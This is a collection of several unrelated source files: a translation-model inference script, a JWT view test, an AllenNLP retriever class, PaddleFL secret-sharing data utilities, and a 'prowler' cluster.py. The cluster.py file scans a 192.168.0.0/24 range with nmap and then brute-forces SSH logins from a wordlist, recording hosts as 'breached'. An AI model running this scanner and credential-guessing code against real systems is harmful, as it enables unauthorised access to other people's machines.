dropoutc = config['dropoutc']
rel_pos = config['rel_pos']
model = make_translate_infer_model(vocab_sizes, dim_model, dim_ff, num_heads,
n_layers, m_layers,
dropouti=dropouti, dropouth=dropouth,
dropouta=dropouta, dropoutc=dropoutc,
rel_pos=rel_pos)
device = th.device(dev_id)
model.load_state_dict(
average_model(['{}-{}.pkl'.format(epoch, config['save_name']) for epoch in range(config['n_epochs'] - 5, config['n_epochs'])]))
model = model.to(device)
model.eval()
if _dataset == 'iwslt':
vocab_trg = vocab_en
elif _dataset == 'wmt':
vocab_trg = vocab
elif _dataset == 'multi':
vocab_trg = vocab_de
for batch in test_loader:
with th.no_grad():
batch.g_enc.edata['etype'] = batch.g_enc.edata['etype'].to(device)
batch.g_enc.ndata['pos'] = batch.g_enc.ndata['pos'].to(device)
batch.g_enc.ndata['x'] = batch.g_enc.ndata['x'].to(device)
for j in range(batcher.k):
batch.g_dec[j].edata['etype'] = batch.g_dec[j].edata['etype'].to(device)
batch.g_dec[j].ndata['pos'] = batch.g_dec[j].ndata['pos'].to(device)
batch.g_dec[j].ndata['x'] = batch.g_dec[j].ndata['x'].to(device)
output = model(batch, vocab_trg.stoi[MTDataset.EOS_TOKEN], sent_max_len=config['sent_max_len'])
for sequence in tensor_to_sequence(vocab_trg.itos, output, batch.n_sent_ctx):
print(sequence)
if __name__ == '__main__':
argparser = argparse.ArgumentParser("machine translation inference")
argparser.add_argument('--config', type=str)
argparser.add_argument('--gpu', type=int, default=0)
args = argparser.parse_args()
with open(args.config, 'r') as f:
        config = yaml.load(f, Loader=yaml.SafeLoader)
run(args.gpu, config)
|
Chapter09/dataservice/tests/test_views.py | surinkim/Python-Microservices-Development | 208 | 121338 |
import os
import unittest
import jwt
from dataservice.app import app
from flask_webtest import TestApp as _TestApp
_HERE = os.path.dirname(__file__)
with open(os.path.join(_HERE, 'privkey.pem')) as f:
_KEY = f.read()
def create_token(data):
return jwt.encode(data, _KEY, algorithm='RS512')
_TOKEN = {'iss': 'runnerly',
'aud': 'runnerly.io'}
class TestViews(unittest.TestCase):
def setUp(self):
self.app = _TestApp(app)
self.token = create_token(_TOKEN).decode('ascii')
self.headers = {'Authorization': 'Bearer ' + self.token}
def test_one(self):
resp = self.app.get('/', headers=self.headers)
self.assertEqual(resp.status_code, 200)
|
examples_allennlp/utils/retrieval/retrievers/retriever.py | techthiyanes/luke | 467 | 121357 |
from typing import Tuple
import torch
from allennlp.common import Registrable
class Retriever(Registrable):
def _post_process_scores(self, scores: torch.Tensor):
raise NotImplementedError
def __call__(self, scores: torch.Tensor) -> Tuple[torch.LongTensor, torch.LongTensor]:
"""
Parameters
----------
scores: torch.Tensor (num_queries, num_targets)
"""
scores = self._post_process_scores(scores)
max_scores, indices = torch.max(scores, dim=1)
return max_scores, indices
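
# Not part of the original luke example: a hedged sketch of a concrete Retriever using
# AllenNLP's Registrable.register decorator; the "softmax_example" name and the softmax
# post-processing are illustrative assumptions, not the project's own retrievers.
@Retriever.register("softmax_example")
class SoftmaxRetriever(Retriever):
    def _post_process_scores(self, scores: torch.Tensor):
        # normalize each query's scores over the target axis
        return torch.softmax(scores, dim=1)


if __name__ == "__main__":
    retriever = SoftmaxRetriever()
    max_scores, indices = retriever(torch.randn(4, 10))
    print(max_scores.shape, indices.shape)  # torch.Size([4]) torch.Size([4])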
|
cluster.py | Seabreg/prowler | 103 | 121418 |
def compute(hostname):
import os
valid = "online"
breached = False
credentials = None
fingerprint = None
services = None
os_match = None
if (os.system("ping -c 1 -w 1 " + hostname)) == 0:
print("Host", hostname, "is online, starting nmap")
from libnmap.process import NmapProcess
from libnmap.parser import NmapParser
from libnmap.objects.os import NmapOSClass
nmproc = NmapProcess(targets=hostname, options="-O")
rc=nmproc.run()
parsed = NmapParser.parse(nmproc.stdout)
host = parsed.hosts[0]
#print("{0} {1}".format(host.address, " ".join(host.hostnames)))
os_match = []
if host.os_fingerprinted:
fingerprint = host.os.osmatches
print("OS Fingerprint:")
for osm in host.os.osmatches:
print("Found Match:{0} ({1}%)".format(osm.name, osm.accuracy))
for osc in osm.osclasses:
os_match.append(str(osc.description))
print("\tOS Class: {0}".format(osc.description))
else:
fingerprint = None
services = []
for serv in host.services:
services.append(str(serv.port) + "/" + str(serv.service))
print("Open ports:", services)
if serv.port == 22:
print("------starting credentials test------")
import paramiko, time
client = paramiko.client.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy)
uid_list, pwd_list=[], []
f = open('/home/pi/prowler/wordlists/wordlist_1.txt','r')
for row in f:
split = row.split(" ")
uid_list.append(split[0])
pwd_list.append(split[1])
for i, uid in enumerate(uid_list):
pwd = pwd_list[i]
try:
if breached == False:
#time.sleep(0.1) # for when SSH connection keeps dropping
try:
client.connect(hostname,username=uid,password=<PASSWORD>)
stdin, stdout, stderr = client.exec_command('ls -l')
print("[!] Successfully connected to host", hostname)
status = "Poor SSH Credentials"
breached = True
credentials = [<PASSWORD>, pwd]
client.close()
except paramiko.AuthenticationException:
client.close()
#print("Failed to pwn. Trying again...")
except Exception as e:
print("Failed to pwn, error:", e)
except Exception as e:
print("Failed to pwn, error:", e)
else:
valid = "offline"
return hostname, os_match, services, breached, valid
if __name__ == '__main__':
import dispy, time, pika
import logging
import dispy.httpd
print("[i][dispy] Initialising Cluster")
#workers = ['192.168.0.133','192.168.0.110'
workers = ['192.168.0.170','192.168.0.111',
'192.168.0.153','192.168.0.195']
cluster = dispy.JobCluster(compute, nodes=workers, ip_addr='192.168.0.142')
http_server = dispy.httpd.DispyHTTPServer(cluster)
jobs, test_range = [], []
for i in range(0, 1):
for j in range(0, 255):
test_range.append("192.168." + str(i) + "." + str(j))
print("[i] Testing " + str(len(test_range)) + " hostnames")
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
channel = connection.channel()
channel.queue_declare(queue='scan_results')
time.sleep(4) # make sure cluster is connected
cluster.print_status()
start = time.time()
for i, address in enumerate(test_range):
# schedule execution of 'compute' on a node (running 'dispynode.py') with a parameter
job = cluster.submit(address)
job.id = i # optionally associate an ID to job (if needed later)
jobs.append(job)
# cluster.wait() # waits for all scheduled jobs to finish
for job in jobs:
try:
result = job()
hostname, fingerprint, services, breached, valid = result # waits for job to finish and returns results
#result_security = str(hostname) + " is " + str(valid) + ". Breached: " str(breached) + " with credentials " + str(credentials)
#print(job.ip_addr,":",result_security)
#print(os_matches)
if valid == "online":
message = [hostname, fingerprint, services, breached]
print(message)
try:
channel.basic_publish(exchange='scan_results_exchange', routing_key='scan_results', body=str(message))
print("Message published")
except Exception as e:
print("[!] Message failed to publish:", str(e))
try:
print("Refreshing connection")
try:
connection.close()
except Exception as e:
print(e)
pass
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
channel = connection.channel()
channel.queue_declare(queue='scan_results')
except Exception as e:
print("Error restarting connection", str(e))
channel.basic_publish(exchange='scan_results_exchange', routing_key='scan_results', body=str(message))
print("Message published successfully (second time)")
# print('OS Description : {0}'.format(osclass['osfamily']) for osclass in nmap.Portscanner[job.ip_addr]['osclass'])
# other fields of 'job' that may be useful:
# print(job.stdout, job.stderr, job.exception, job.ip_addr, job.start_time, job.end_time)
else:
print(hostname, "is offline")
except Exception as e:
print("[!]",str(job),"failed with error:",str(e))
print("[+] Debug:", job.stdout, job.stderr, job.exception)
connection.close()
end = time.time()
print("\n","[i] Total time taken =", str(end - start))
cluster.print_status()
http_server.shutdown()
cluster.close()
|
python/paddle_fl/mpc/data_utils/data_utils.py | barrierye/PaddleFL | 379 | 121466 |
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module provide data utilities for PrivC protocol, including
data encryption, decryption, share save and loading.
"""
import abc
import six
import os
import numpy as np
import paddle
import paddle.fluid as fluid
import mpc_data_utils as mdu
from ..layers import __all__ as all_ops
from .op_extra_desc import add_extra_desc
# operators that should be skipped when encrypt and decrypt
op_to_skip = ['feed', 'fetch', 'scale', 'mpc_init']
# operators that are supported currently for model encryption and decryption
supported_mpc_ops = all_ops + ['fill_constant', 'sgd'] + op_to_skip
# variables that used as plain variables and need no encryption
plain_vars = ['learning_rate_0']
MPC_MODEL_NAME = "__model__.mpc"
MODEL_NAME = "__model__"
MODEL_SHARE_DIR = "model_share"
MPC_OP_PREFIX = "mpc_"
@six.add_metaclass(abc.ABCMeta)
class DataUtils(object):
"""
abstract class for data utils.
"""
def __init__(self):
self.SHARE_NUM = None
self.PRE_SHAPE = None
self.MPC_ONE_SHARE = None
def encrypt(self, number):
"""
Encrypts the plaintext number into secret shares
Args:
number: float, the number to share
Returns:
shares of input number
"""
pass
def decrypt(self, shares):
"""
Reveal plaintext value from raw secret shares
Args:
shares: shares to reveal from (list)
Return:
the plaintext number (float)
"""
pass
def make_shares(self, num_array):
"""
Create raw shares for an array.
Args:
num_array: the input data array
Returns:
shares of the num_array in type of ndarray
"""
old_size = num_array.size
flat_num_array = num_array.reshape(old_size,)
new_shape = (self.SHARE_NUM, ) + num_array.shape
result = np.empty((old_size, self.SHARE_NUM), dtype=np.int64)
for idx in six.moves.range(0, old_size):
result[idx] = self.encrypt(flat_num_array[idx])
result = result.transpose(1, 0)
result = result.reshape(new_shape)
return result
def get_shares(self, shares, index):
"""
Build mpc shares from raw shares according to index
Args:
shares: the input raw share array
index: index of the mpc share
Returns:
mpc shares array corresponding to index
"""
pass
def save_shares(self, share_reader, part_name):
"""
Combine raw shares to mpc shares, and persists to files. Each mpc share will be
put into the corresponding file, e.g., ${part_name}.part[0/1/2].
Args:
            share_reader: iterable function object returning a single array of raw shares
in shape of [2/3, ...] each time
part_name: file name
Returns:
files with names of ${part_name}.part[0/1/2]
"""
pass
def load_shares(self, part_name, id, shape, append_share_dim=True):
"""
Load mpc shares from file with name ${part_name}.part{id} in shape of ${shape}.
Args:
part_name and id: use to build the file name of ${part_name}.part{id}
shape: the shape of output array
Returns:
            iterable function object returning a share array with the given shape each time
"""
if append_share_dim == True:
shape = self.PRE_SHAPE + shape
ext = ".part{}".format(id)
share_size = np.prod(shape) * 8 # size of int64 in bytes
def reader():
"""
internal reader
"""
with open(part_name + ext, 'rb') as part_file:
share = part_file.read(share_size)
while share:
yield np.frombuffer(share, dtype=np.int64).reshape(shape)
share = part_file.read(share_size)
return reader
    def reconstruct(self, shares, type=float):
"""
Reconstruct plaintext from mpc shares
Args:
shares: all the mpc share arrays, where the share slices
are stored rowwise
type: expected type of final result
Returns:
plaintext array reconstructed from the mpc shares, with shape of (dims)
"""
pass
def batch(self, reader, batch_size, drop_last=False):
"""
A batch reader return a batch data meeting the shared data's shape.
E.g., a batch arrays with shape (3, 4) of batch_size will be transform to (batch_size, 3, 4).
Args: see paddle.batch method
Returns: the batched reader
"""
pass
def transpile(self, program=None):
"""
Transpile Paddle program into MPC program.
Args:
program: The plain Paddle model program, default to
default_main_program.
Returns: The MPC program.
"""
if program is None:
program = fluid.default_main_program()
place = fluid.CPUPlace()
if program.num_blocks > 1:
raise NotImplementedError(
"The number of blocks in current main program"
"is {}, which is not supported in this version."
                .format(program.num_blocks))
global_block = program.global_block()
g_scope = fluid.global_scope()
        mpc_vars_names = self._transpile_type_and_shape(block=global_block)
# encrypt tensor values for each variable in mpc_var_names
for mpc_var_name in mpc_vars_names:
if g_scope.find_var(mpc_var_name) is not None:
param = g_scope.find_var(mpc_var_name)
param_tensor = np.array(param.get_tensor())
mpc_var = global_block.var(mpc_var_name)
if mpc_var_name not in plain_vars:
param.get_tensor()._set_dims(mpc_var.shape)
# process initialized params that should be 0
set_tensor_value = np.array([param_tensor, param_tensor]).astype(np.int64)
param.get_tensor().set(set_tensor_value, place)
#else:
# param.get_tensor().set(np.array(param.get_tensor()).astype('float64'), place)
# trigger sync to replace old ops.
op_num = global_block.desc.op_size()
_ = global_block.desc.append_op()
global_block.desc._remove_op(op_num, op_num + 1)
return program
def _transpile_type_and_shape(self, block):
"""
Transpile dtype and shape of plain variables into MPC dtype and shape.
And transpile op type into MPC type.
Args:
block: The block in Paddle program.
Returns: A set of variable names to encrypt.
"""
mpc_vars_names = set()
# store variable name in mpc_vars_names, and encrypt dtype and shape
for var_name in block.vars:
var = block.var(var_name)
if var.name != "feed" and var.name != "fetch":
mpc_vars_names.add(var.name)
if var_name in plain_vars:
# var.desc.set_dtype(fluid.framework.convert_np_dtype_to_dtype_(np.float64))
continue
encrypted_var_shape = self.PRE_SHAPE + var.shape
var.desc.set_dtype(fluid.framework.convert_np_dtype_to_dtype_(np.int64))
var.desc.set_shape(encrypted_var_shape)
# encrypt op type, or other attrs if needed
for op in block.ops:
            if self._is_supported_op(op.type):
                if op.type == 'fill_constant':
                    op._set_attr(name='shape', val=self.MPC_ONE_SHARE.shape)
                    # set default MPC value for fill_constant OP
                    op._set_attr(name='value', val=self.MPC_ONE_SHARE)
                    op._set_attr(name='dtype', val=3)
                elif op.type in op_to_skip:
pass
else:
add_extra_desc(op, block)
op.desc.set_type(MPC_OP_PREFIX + op.type)
else:
raise NotImplementedError('Operator {} is unsupported.'
.format(op.type))
return mpc_vars_names
def encrypt_model(self, program, mpc_model_dir=None, model_filename=None):
"""
Encrypt model, and save encrypted model (i.e., MPC model shares) into
files for MPC training, updating, or inference.
Args:
program: The loaded program of paddle model.
mpc_model_dir: The directory that save MPC model shares.
model_filename: The name of MPC model file, default is __model__.mpc.
"""
place = fluid.CPUPlace()
exe = fluid.Executor(place)
# TODO(xukun): support more blocks. Tips: may just adding "for loop" for all blocks.
if program.num_blocks > 1:
raise NotImplementedError(
"The number of blocks in current main program"
"is {}, which is not supported in this version."
                .format(program.num_blocks))
global_block = program.global_block()
g_scope = fluid.global_scope()
        mpc_vars_names = self._transpile_type_and_shape(block=global_block)
# encrypt tensor values for each variable in mpc_var_names
for mpc_var_name in mpc_vars_names:
if g_scope.find_var(mpc_var_name) is not None:
param = g_scope.find_var(mpc_var_name)
param_tensor = np.array(param.get_tensor())
param_tensor_shares = self.make_shares(param_tensor)
mpc_var = global_block.var(mpc_var_name)
for idx in six.moves.range(self.SHARE_NUM):
if mpc_var_name not in plain_vars:
param.get_tensor()._set_dims(mpc_var.shape)
set_tensor_value = self.get_shares(param_tensor_shares, idx)
param.get_tensor().set(set_tensor_value, place)
#else:
# param.get_tensor().set(np.array(param.get_tensor()).astype('float64'), place)
param_share_dir = os.path.join(
mpc_model_dir, MODEL_SHARE_DIR + "_" + str(idx))
fluid.io.save_vars(
executor=exe,
dirname=param_share_dir,
vars=[mpc_var],
filename=mpc_var_name)
# trigger sync to replace old ops.
op_num = global_block.desc.op_size()
_ = global_block.desc.append_op()
global_block.desc._remove_op(op_num, op_num + 1)
# save mpc model file
model_basename = os.path.basename(
model_filename) if model_filename is not None else MPC_MODEL_NAME
for idx in six.moves.range(self.SHARE_NUM):
model_share_dir = os.path.join(mpc_model_dir,
MODEL_SHARE_DIR + "_" + str(idx))
if not os.path.exists(model_share_dir):
os.makedirs(model_share_dir)
model_name = os.path.join(model_share_dir, model_basename)
with open(model_name, "wb") as f:
f.write(program.desc.serialize_to_string())
def decrypt_model(self, mpc_model_dir, plain_model_path, mpc_model_filename=None, plain_model_filename=None):
"""
Reveal a paddle model. Load encrypted model (i.e., MPC model shares) from files and decrypt it
into paddle model.
Args:
mpc_model_dir: The directory of all model shares.
plain_model_path: The directory to save revealed paddle model.
mpc_model_filename: The name of encrypted model file.
plain_model_filename: The name of decrypted model file.
"""
share_dirs = []
for sub_dir in os.listdir(mpc_model_dir):
if not sub_dir.startswith("."):
share_dirs.append(os.path.join(mpc_model_dir, sub_dir))
place = fluid.CPUPlace()
exe = fluid.Executor(place=place)
mpc_model_basename = os.path.basename(
mpc_model_filename) if mpc_model_filename is not None else MPC_MODEL_NAME
[main_prog, _, _] = fluid.io.load_inference_model(
dirname=share_dirs[0], executor=exe, model_filename=mpc_model_basename)
if main_prog.num_blocks > 1:
raise NotImplementedError(
"The number of blocks in current main program"
"is {}, which is not supported in this version"
                .format(main_prog.num_blocks))
global_block = main_prog.global_block()
g_scope = fluid.global_scope()
# a set storing unique variables to decrypt
vars_set = set()
# store variable name in vars_set, and decrypt dtype and shape
for mpc_var_name in global_block.vars:
mpc_var = global_block.var(mpc_var_name)
if mpc_var.name != "feed" and mpc_var.name != "fetch":
vars_set.add(mpc_var.name)
if mpc_var_name in plain_vars:
# var.desc.set_dtype(fluid.framework.convert_np_dtype_to_dtype_(np.float64))
continue
else:
plain_var_shape = mpc_var.shape
mpc_var.desc.set_shape(plain_var_shape)
mpc_var.desc.set_dtype(fluid.framework.convert_np_dtype_to_dtype_(np.float32))
# remove init op
first_mpc_op = global_block.ops[0]
if first_mpc_op.type == 'mpc_init':
global_block._remove_op(0)
# decrypt op type, or other attrs if needed
for mpc_op in global_block.ops:
# rename ops
if str(mpc_op.type).startswith(MPC_OP_PREFIX):
new_type = str(mpc_op.type)[len(MPC_OP_PREFIX):]
mpc_op.desc.set_type(new_type)
elif mpc_op.type == 'fill_constant':
mpc_op._set_attr(name='shape', val=(1))
mpc_op._set_attr(name='value', val=1.0)
mpc_op._set_attr(name='dtype', val=5)
# decrypt tensor values for each variable in vars_set
for var_name in vars_set:
var = global_block.var(var_name)
if g_scope.find_var(var_name) is not None:
param = g_scope.find_var(var_name)
if var_name in plain_vars:
pass
else:
# reconstruct plaintext
param_tensor_shares = self._get_param_all_shares(
var_name, share_dirs, mpc_model_basename)
                    param_tensor = self.reconstruct(
                        param_tensor_shares, type=np.float32)
param.get_tensor()._set_dims(var.shape)
param.get_tensor().set(param_tensor, place)
fluid.io.save_vars(
executor=exe,
dirname=plain_model_path,
vars=[var],
filename=var_name)
# trigger sync to replace old ops
op_num = global_block.desc.op_size()
_ = global_block.desc.append_op()
global_block.desc._remove_op(op_num, op_num + 1)
# save plaintext model file.
model_basename = os.path.basename(
plain_model_filename) if plain_model_filename is not None else MODEL_NAME
if not os.path.exists(plain_model_path):
os.makedirs(plain_model_path)
model_name = os.path.join(plain_model_path, model_basename)
with open(model_name, "wb") as f:
f.write(main_prog.desc.serialize_to_string())
def _get_param_all_shares(self, param_name, share_dirs, model_file):
"""
Get all shares of one parameter from directories.
Args:
param_name: The name of parameter.
share_dirs: The directories which storing model shares.
model_file: The name of model file.
Returns:
ndarray. The loaded shares.
"""
exe = fluid.Executor(place=fluid.CPUPlace())
param_shares = []
for share_dir in share_dirs:
_ = fluid.io.load_inference_model(
dirname=share_dir, executor=exe, model_filename=model_file)
g_scope = fluid.global_scope()
param = g_scope.find_var(param_name)
param_tensor = np.array(param.get_tensor())
param_shares.append(param_tensor)
return np.array(param_shares, dtype=np.int64)
def _is_supported_op(self, op_name):
"""
Check if op is supported for encryption and decryption.
Args:
op_name: The name of op.
Returns:
True if supported.
"""
if op_name not in supported_mpc_ops:
if str(op_name).endswith('_grad'):
                return self._is_supported_op(str(op_name)[:-5])
else:
return False
return True
def load_mpc_model(self, exe, mpc_model_dir, mpc_model_filename, inference=False):
"""
Load MPC model from files. The loaded program of the model would be inserted
init OP and then switched to default_main_program for further MPC procedure.
Args:
exe: The executor used for loading.
mpc_model_dir: The directory of MPC model.
mpc_model_filename: The filename of MPC model.
inference: Whether the model to load is used for inference. If true, the
model to load should be an inference model, and feed_name, fetch_targets
would be returned with the loaded program after inserting init OP. Otherwise,
after inserting init OP, the loaded program would be switched to
default_main_program and returned. Default value is False.
Returns:
default_main_program if inference is False. Otherwise, default_main_program,
feed_name, and fetch_targets would be returned.
"""
mpc_program, feed_names, fetch_targets = fluid.io.load_inference_model(executor=exe,
dirname=mpc_model_dir,
model_filename=mpc_model_filename)
# find init OP
global_block = fluid.default_main_program().global_block()
init_op_idx = self._find_init_op_idx(global_block)
if init_op_idx < 0:
raise RuntimeError('No mpc_init op in global block, '
'maybe you should use paddle_fl.mpc.init() first.')
init_op = global_block.ops[init_op_idx]
# find the last feed OP for inserting init OP
last_feed_op_idx = self._find_last_feed_op_idx(mpc_program.global_block())
# insert init OP as the first OP of MPC program if no feed OP,
# otherwise, insert it after the last feed OP.
insert_idx = 0 if last_feed_op_idx < 0 else last_feed_op_idx + 1
loaded_mpc_program = self._insert_init_op(main_prog=mpc_program,
init_op=init_op,
index=insert_idx)
if inference:
return loaded_mpc_program, feed_names, fetch_targets
else:
# switch loaded_mpc_program to default_main_program
fluid.framework.switch_main_program(loaded_mpc_program)
return fluid.default_main_program()
def _find_init_op_idx(self, block):
"""
Find the index of mpc_init op.
Args:
block: The block of program.
Returns:
The index of mpc_init op.
"""
for idx, op in enumerate(block.ops):
if op.type == 'mpc_init':
return idx
return -1
def _find_last_feed_op_idx(self, block):
"""
Find the index of the last feed OP.
Args:
block: The block of program.
Returns:
The index of the last feed OP.
"""
feed_idx = -1
for idx, op in enumerate(block.ops):
if op.type == 'feed':
feed_idx = idx
return feed_idx
def save_trainable_model(self, exe, model_dir, model_filename=None, program=None):
"""
Save trainable model, which includes saving program and
persistable parameters into files. The saved model can be
loaded by fluid.io.load_inference_model for further training
or updating.
Args:
exe: The executor used for saving.
model_dir: The directory of model to save.
model_filename: The filename of model to save.
program: The program to save, default to default_main_program.
TODO: can move this to paddle_mpc/python/paddle_fl/mpc/io.py
"""
if not os.path.exists(model_dir):
os.makedirs(model_dir)
model_basename = os.path.basename(
model_filename) if model_filename is not None else MPC_MODEL_NAME
# save program
model_name = os.path.join(model_dir, model_basename)
if program is None:
program = fluid.default_main_program()
with open(model_name, "wb") as f:
f.write(program.desc.serialize_to_string())
# save parameters
fluid.io.save_persistables(executor=exe,
dirname=model_dir,
main_program=program)
def _insert_init_op(self, main_prog, init_op, index):
"""
Insert init OP into main_prog according to the index.
Args:
main_prog: The program to insert init OP.
init_op: The init OP for MPC running.
index: The place that the init_op to insert.
Returns:
The program after inserting init OP.
"""
main_prog.global_block()._sync_with_cpp()
op_desc = main_prog.global_block().desc._insert_op(index)
mpc_init_op = fluid.framework.Operator(block=main_prog.global_block(),
desc=op_desc,
type=init_op.type,
attrs=init_op.all_attrs())
main_prog.global_block().ops.insert(index, mpc_init_op)
return main_prog
class Aby3DataUtils(DataUtils):
"""
Aby3DataUtils
"""
def __init__(self):
"""
init
"""
self.SHARE_NUM = 3
self.PRE_SHAPE = (2, )
self.MPC_ONE_SHARE = mdu.aby3_one_share
def encrypt(self, number):
"""
Encrypts the plaintext number into three secret shares
Args:
number: float, the number to share
Returns:
three shares of input number
"""
try:
return mdu.aby3_share(number)
except Exception as e:
raise RuntimeError(str(e))
def decrypt(self, shares):
"""
Reveal plaintext value from raw secret shares
Args:
shares: shares to reveal from (list)
Return:
the plaintext number (float)
"""
try:
return mdu.aby3_reveal(shares)
except Exception as e:
raise RuntimeError(str(e))
def get_shares(self, shares, index):
"""
Build ABY3 shares from raw shares according to index
Args:
shares: the input raw share array, expected to have shape of [3, ...]
index: index of the ABY3 share, should be 0, 1, or 2
Returns:
ABY3 shares array corresponding to index, e.g.:
[shares[index % 3], shares[(index + 1) %3]]
Examples:
input_shares: [3, 2, 4], where 3 is the dim of raw shares
index: 0
output: [input_shares[0], input_shares[1]], shape = (2, 2, 4)
"""
if index < 0 or index >= self.SHARE_NUM:
raise ValueError("Index should fall in (0..2) but now: {}".format(
index))
if shares.size % self.SHARE_NUM != 0 or shares.shape[0] != self.SHARE_NUM:
raise ValueError("Shares to split has incorrect shape: {}".format(
shares.shape))
first = index % self.SHARE_NUM
second = (index + 1) % self.SHARE_NUM
return np.array([shares[first], shares[second]], dtype=np.int64)
def save_shares(self, share_reader, part_name):
"""
Combine raw shares into ABY3 shares and persist them to files. Each ABY3 share will be
put into the corresponding file, e.g., ${part_name}.part[0..2]. For example,
[share0, share1] -> ${part_name}.part0
[share1, share2] -> ${part_name}.part1
[share2, share0] -> ${part_name}.part2
Args:
share_reader: iterable function object returning a single array of raw shares
of shape [3, ...] each time
part_name: file name
Returns:
files with names of ${part_name}.part[0..2]
"""
exts = [".part0", ".part1", ".part2"]
with open(part_name + exts[0], 'wb') as file0, \
open(part_name + exts[1], 'wb') as file1, \
open(part_name + exts[2], 'wb') as file2:
files = [file0, file1, file2]
for shares in share_reader():
for idx in six.moves.range(0, 3): # 3 parts
share = self.get_shares(shares, idx)
files[idx].write(share.tostring())
def reconstruct(self, aby3_shares, type=np.float):
"""
Reconstruct plaintext from ABY3 shares
Args:
aby3_shares: all three ABY3 share arrays, each of shape (2, dims), where the share slices
are stored rowwise
type: expected type of final result
Returns:
plaintext array reconstructed from the three ABY3 shares, with shape of (dims)
Example:
aby3_shares: three ABY3 shares of shape [2, 2]
shares[0]: [[a0, b0], [a1, b1]]
shares[1]: [[a1, b1], [a2, b2]]
shares[2]: [[a2, b2], [a0, b0]]
output:
[a, b], where a = decrypt(a0, a1, a2), b = decrypt(b0, b1, b2)
"""
if len(aby3_shares) != self.SHARE_NUM: # should collect shares from 3 parts
raise ValueError("Number of aby3 shares should be 3 but was: {}".
format(len(aby3_shares)))
raw_shares = aby3_shares[:, 0]
data_shape = raw_shares.shape[1:] # get rid of the first dim of [3, xxx]
data_size = np.prod(data_shape)
row_first_raw_shares = raw_shares.reshape(self.SHARE_NUM, data_size).transpose(1, 0)
result = np.empty((data_size, ), dtype=type)
for idx in six.moves.range(0, data_size):
result[idx] = self.decrypt(row_first_raw_shares[idx].tolist())
return result.reshape(data_shape)
def batch(self, reader, batch_size, drop_last=False):
"""
Build a batch reader that returns batches matching the shared data's shape.
E.g., arrays of shape (2, 3, 4) are batched into (2, batch_size, 3, 4),
where the leading dim 2 is the number of secret shares in ABY3.
Args: see paddle.batch method
Returns: the batched reader
"""
paddle_batch_reader = paddle.batch(reader, batch_size, drop_last)
def reshaped_batch_reader():
"""
internal reader
"""
r = paddle_batch_reader()
for instance in r:
perm = np.arange(0, len(np.array(instance).shape), 1)
# permute the first two axes
perm[0], perm[1] = perm[1], perm[0]
yield np.transpose(instance, perm)
return reshaped_batch_reader
class PrivcDataUtils(DataUtils):
"""
PrivcDataUtils
"""
def __init__(self):
"""
init
"""
self.SHARE_NUM = 2
self.PRE_SHAPE = ()
self.MPC_ONE_SHARE = mdu.privc_one_share
def encrypt(self, number):
"""
Encrypts the plaintext number into two secret shares
Args:
number: float, the number to share
Returns:
two shares of input number
"""
try:
return mdu.privc_share(number)
except Exception as e:
raise RuntimeError(str(e))
def decrypt(self, shares):
"""
Reveal plaintext value from raw secret shares
Args:
shares: shares to reveal from (list)
Return:
the plaintext number (float)
"""
try:
return mdu.privc_reveal(shares)
except Exception as e:
raise RuntimeError(str(e))
def get_shares(self, shares, index):
"""
Build share from raw shares according to index
Args:
shares: the input raw share array, expected to have shape of [SHARE_NUM, ...]
index: index of the privc share, should be 0 or 1
Returns:
share corresponding to index, e.g.: shares[index]
"""
if index < 0 or index >= self.SHARE_NUM:
raise ValueError("Index should fall in {0, {}} but now: {}".format(
self.SHARE_NUM, index))
if shares.size % self.SHARE_NUM != 0 or shares.shape[0] != self.SHARE_NUM:
raise ValueError("Shares to split has incorrect shape: {}".format(
shares.shape))
return np.array(shares[index], dtype=np.int64)
def save_shares(self, share_reader, part_name):
"""
Combine raw shares into privc shares and persist them to files. Each privc share will be
put into the corresponding file, e.g., ${part_name}.part[0..1]. For example,
share0 -> ${part_name}.part0
share1 -> ${part_name}.part1
Args:
share_reader: iterable function object returning a single array of raw shares
of shape [2, ...] each time
part_name: file name
Returns:
files with names of ${part_name}.part[0..1]
"""
exts = [".part0", ".part1"]
with open(part_name + exts[0], 'wb') as file0, \
open(part_name + exts[1], 'wb') as file1:
files = [file0, file1]
for shares in share_reader():
for idx in six.moves.range(0, 2):
share = self.get_shares(shares, idx)
files[idx].write(share.tostring())
def reconstruct(self, privc_shares, type=np.float):
"""
Reconstruct plaintext from privc shares
Args:
privc_shares: both privc share arrays, where the share slices
are stored rowwise
type: expected type of final result
Returns:
plaintext array reconstructed from the two privc shares, with shape of (dims)
Example:
privc_shares: two privc shares of shape [2]
shares[0]: [a0, b0]
shares[1]: [a1, b1]
output:
[a, b], where a = decrypt(a0, a1), b = decrypt(b0, b1)
"""
if len(privc_shares) != self.SHARE_NUM: # should collect shares from 2 parts
raise ValueError("Number of privc shares should be 2 but was: {}".
format(len(privc_shares)))
raw_shares = privc_shares
data_shape = raw_shares.shape[1:] # get rid of the first dim of [2, xxx]
data_size = np.prod(data_shape)
row_first_raw_shares = raw_shares.reshape(self.SHARE_NUM, data_size).transpose(1, 0)
result = np.empty((data_size, ), dtype=type)
for idx in six.moves.range(0, data_size):
result[idx] = self.decrypt(row_first_raw_shares[idx].tolist())
return result.reshape(data_shape)
def batch(self, reader, batch_size, drop_last=False):
"""
Build a batch reader that returns batches matching the shared data's shape.
E.g., arrays of shape (3, 4) are batched into (batch_size, 3, 4).
Args: see paddle.batch method
Returns: the batched reader
"""
paddle_batch_reader = paddle.batch(reader, batch_size, drop_last)
def reshaped_batch_reader():
"""
internal reader
"""
r = paddle_batch_reader()
for instance in r:
yield np.array(instance)
return reshaped_batch_reader
data_utils_list = {
'aby3': Aby3DataUtils(),
'privc': PrivcDataUtils()}
def get_datautils(protocol_name):
return data_utils_list[protocol_name]
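# Usage sketch (illustrative only; it assumes the compiled `mpc_data_utils`
# extension used above is importable, which this module already requires):
#
#     aby3 = get_datautils('aby3')
#     shares = aby3.encrypt(1.25)                 # three raw secret shares of 1.25
#     aby3.decrypt(list(shares))                  # reveals ~1.25
#
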